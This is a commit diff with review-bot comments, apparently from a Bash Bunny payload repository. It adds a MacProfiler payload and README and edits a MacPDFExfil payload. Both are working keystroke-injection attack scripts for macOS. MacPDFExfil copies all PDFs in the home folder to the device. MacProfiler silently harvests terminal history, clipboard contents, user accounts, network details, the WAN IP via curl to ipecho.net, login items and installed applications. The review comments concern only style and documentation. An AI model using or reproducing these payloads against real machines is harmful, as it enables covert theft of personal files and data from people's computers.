Added MacProfiler payload (#195)
* clean up loot added sub folder so all files are not in root of loot folder
* MacProfiler NewPayload for Profiling Mac systems
* Make DIR
pull/211/head
parent a11091c5c4
commit 33d62ff9e9
|
@ -1,4 +1,4 @@
|
|||
#!/bin/bash
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: MacPDFExfil
|
||||
# Author: k1ul3ss
|
||||
|
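Review bot: The `#!/bin/bash` line at the top of this hunk is removed and re-added with no visible difference, so the change is presumably whitespace or line endings only. If that is intended (for example normalising line endings), say so in the commit message; if not, drop this hunk so the diff for MacPDFExfil contains only the loot directory change.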
@ -14,13 +14,15 @@ ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
|||
dev_name="BashBunny"
|
||||
|
||||
# loot directory
|
||||
lootdir="/Volumes/$dev_name/loot/"
|
||||
lootdir="/Volumes/$dev_name/loot/MacPDFExfil/"
|
||||
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING mkdir -p $lootdir
|
||||
QUACK ENTER
|
||||
# Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage.
|
||||
QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
|
||||
QUACK ENTER
|
||||
|
|
|
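Review bot: The added `QUACK STRING mkdir -p $lootdir` line has no comment, while the `find` line below it does; add one saying it creates the per-payload loot subfolder that `lootdir` now points to. Also note that this payload builds the path from `dev_name` (`/Volumes/$dev_name/loot/MacPDFExfil/`) while the MacProfiler payload added in the same commit hardcodes `/Volumes/BashBunny/...`; pick one convention so both payloads name the volume the same way.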
@ -0,0 +1,52 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MacProfiler
|
||||
# Author: jdetmold
|
||||
# Version: 1.0
|
||||
#
|
||||
# Creates a basic system profile for a mac computer
|
||||
# Saves all data to loot/MacProfiler/{system name}/item.txt
|
||||
#
|
||||
# Saves the following data to individule files:
|
||||
#
|
||||
#Terminal history.
|
||||
#Current clipboard contents.
|
||||
#List of users on the system.
|
||||
#ifconfig data.
|
||||
#Systems WAN IP.
|
||||
#All login items set to start up with the system.
|
||||
#List of installed Applications from /Applications.
|
||||
#
|
||||
#
|
||||
# Blue - Running
|
||||
# Green - Finished
|
||||
#
|
||||
|
||||
LED B
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||
|
||||
lootdir=/Volumes/BashBunny/loot/MacProfiler/$\(hostname\)
|
||||
|
||||
# Start Terminal
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2500
|
||||
|
||||
# Save data
|
||||
QUACK STRING mkdir -p $lootdir\; history \> $lootdir/history.txt\; osascript -e \"the clipboard\" \> $lootdir/clipboard.txt\; dscl . list /Users \| grep -v '_' \> $lootdir/users.txt\; ifconfig \> $lootdir/ifconfig.txt\; curl ipecho.net/plain \> $lootdir/ExternalIP.txt\; osascript -e \'tell application \"System Events\" to get the name of every login item\' \>$lootdir/LoginItems.txt\; ls /Applications/ \> $lootdir/Applications.txt\;
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
# Eject
|
||||
QUACK STRING diskutil eject /Volumes/BashBunny/;
|
||||
QUACK ENTER
|
||||
QUACK STRING killall Terminal
|
||||
QUACK ENTER
|
||||
|
||||
# Sync filesystem
|
||||
sync
|
||||
|
||||
# Green LED for finished
|
||||
LED G
|
|
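Review bot: The header comment lists "Systems WAN IP" but does not say that the "Save data" line obtains it with `curl ipecho.net/plain`, which is a request from the target to a third-party service over plain HTTP (curl defaults to http when no scheme is given). State that in the header so anyone reviewing or running the payload on an authorised test knows it generates outbound traffic and depends on Internet access. Two smaller points: "individule" in the header should be "individual", and the `;` at the end of `QUACK STRING diskutil eject /Volumes/BashBunny/;` is unescaped, unlike the `\;` separators in the "Save data" line, so the two lines are inconsistent about whether the semicolon is meant to be typed.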
@ -0,0 +1,30 @@
|
|||
# MacProfiler
|
||||
* Author: jdetmold
|
||||
* Version: Version 1.0
|
||||
* Target: Mac
|
||||
|
||||
## Description
|
||||
|
||||
Uses a HID/Storage Attack to create a system profile including the following information:
|
||||
Terminal history.
|
||||
Current clipboard contents.
|
||||
List of users on the system.
|
||||
ifconfig data.
|
||||
Systems WAN IP.
|
||||
All login items set to start up with the system.
|
||||
List of installed Applications from /Applications.
|
||||
|
||||
## Configuration
|
||||
|
||||
None needed.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Blue | Running |
|
||||
| Green | Finished |
|
||||
|
||||
|
||||
## Discussion
|
||||
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40829-payload-macprofiler/ "Hak5 Forum Thread")
|
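Review bot: The items under "## Description" (from "Terminal history." to "List of installed Applications from /Applications.") have no list markers, so Markdown will run them together into one paragraph; prefix each with `* ` as the Author/Version/Target lines above already do. "Version: Version 1.0" repeats the word "Version". The README should also mention what the header of the payload leaves out: that collecting the WAN IP makes an outbound request to ipecho.net, and that "Configuration: None needed" assumes the storage volume is named BashBunny, since the payload hardcodes `/Volumes/BashBunny`.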